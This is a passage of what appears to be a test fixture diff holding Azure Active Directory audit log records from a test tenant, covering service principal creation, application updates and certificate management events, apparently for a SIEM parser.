+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:36:31", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "[\r\n  true\r\n]", "OldValue": "[]", "Name": "AccountEnabled"}, {"Name": "AppPrincipalId", "OldValue": "[]", "NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]"}, {"NewValue": "[\r\n  \"siem2\"\r\n]", "OldValue": "[]", "Name": "DisplayName"}, {"NewValue": "[\r\n  \"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"\r\n]", "OldValue": "[]", "Name": "ServicePrincipalName"}, {"Name": "Credential", "OldValue": "[]", "NewValue": "[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\"\r\n  }\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"AccountEnabled\",\"AppPrincipalId\",\"DisplayName\",\"ServicePrincipalName\",\"Credential\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "381d015d-6660-4dce-af99-4cd8c3b61d4d"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:36:31.1327910Z"}, {"Name": "env_epoch", "Value": "NNJOH"}, {"Name": "env_seqNum", "Value": "39121960"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR568"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add service principal.", "Id": "48403af8-b712-4e63-a999-686b631240ac"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826392"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application.", "Id": "aaa361ac-50e8-43f4-9aaf-c19c09e3e3bc"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "KeyDescription", "OldValue": "[]", "NewValue": "[\r\n  \"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\"\r\n]"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "KeyDescription"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"KeyDescription\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826385"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application \u2013 Certificates and secrets management ", "Id": "20a82fa1-625b-491a-a3e8-54d779a9b17e"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem2"}], "ObjectId": "Not Available", "ModifiedProperties": [{"NewValue": "[\r\n  \"[KeyIdentifier=6d944a5f-234c-4879-8de4-39f089d8b96b,KeyType=AsymmetricX509Cert,KeyUsage=Verify,DisplayName=E=asr@example.net, CN=testsiem.onmicrosoft.com, OU=SIEM, O=Elastic, L=Barcelona, S=Barce]\"\r\n]", "OldValue": "[]", "Name": "KeyDescription"}, {"Name": "Included Updated Properties", "OldValue": "", "NewValue": "KeyDescription"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "33cdc459-1335-4d6c-b773-f5eef4df7793"}, {"Name": "extendedAuditEventCategory", "Value": "Application"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"KeyDescription\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.0442303Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826385"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update application \u2013 Certificates and secrets management ", "Id": "20a82fa1-625b-491a-a3e8-54d779a9b17e"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "Included Updated Properties", "OldValue": "", "NewValue": ""}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "531446ed-abd2-468f-96a8-a4dcc7b05168"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:42:45.1042022Z"}, {"Name": "env_epoch", "Value": "VYXPT"}, {"Name": "env_seqNum", "Value": "45826464"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be"}, {"Name": "env_os", "Value": "<null>"}, {"Name": "env_osVer", "Value": "<null>"}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR559"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Update service principal.", "Id": "15adbe69-7974-41ec-8341-208456600ad3"}
+{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:42:45", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"NewValue": "", "OldValue": "", "Name": "Included Updated Properties"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": "<null>"}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": 